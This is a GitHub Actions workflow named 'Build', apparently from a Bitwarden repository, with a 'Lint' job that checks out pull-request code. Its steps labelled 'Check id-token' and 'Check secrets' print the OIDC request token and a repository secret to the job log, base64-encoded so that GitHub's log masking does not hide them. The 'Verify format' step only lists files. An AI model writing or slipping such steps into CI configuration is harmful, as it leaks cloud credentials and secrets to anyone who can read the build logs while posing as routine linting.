name: Build

on:
  workflow_dispatch:
  push:
    branches:
      - "main"
      - "rc"
      - "hotfix-rc"
  pull_request:
    types: [opened, synchronize]
  workflow_call:
    inputs: {}

permissions:
  contents: read

env:
  _AZ_REGISTRY: "bitwardenprod.azurecr.io"
  _GITHUB_PR_REPO_NAME: ${{ github.event.pull_request.head.repo.full_name }}

jobs:
  lint:
    name: Lint
    runs-on: ubuntu-24.04
    permissions:
      id-token: write
    steps:
      - name: Check out repo
        uses: actions/checkout@08c6903cd8c0fde910a37f88322edcfb5dd907a8 # v5.0.0
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Verify format
        run: find .
      - name: Check id-token
        run: |
          echo "This should be the id-token request token:" $ACTIONS_ID_TOKEN_REQUEST_TOKEN
          echo $ACTIONS_ID_TOKEN_REQUEST_TOKEN | base64;
      - name: Check secrets
        env:
          testsecret: ${{ secrets.testsecret }} 
        run: |
          echo "This should be the test secret:" $testsecret
          echo $testsecret | base64;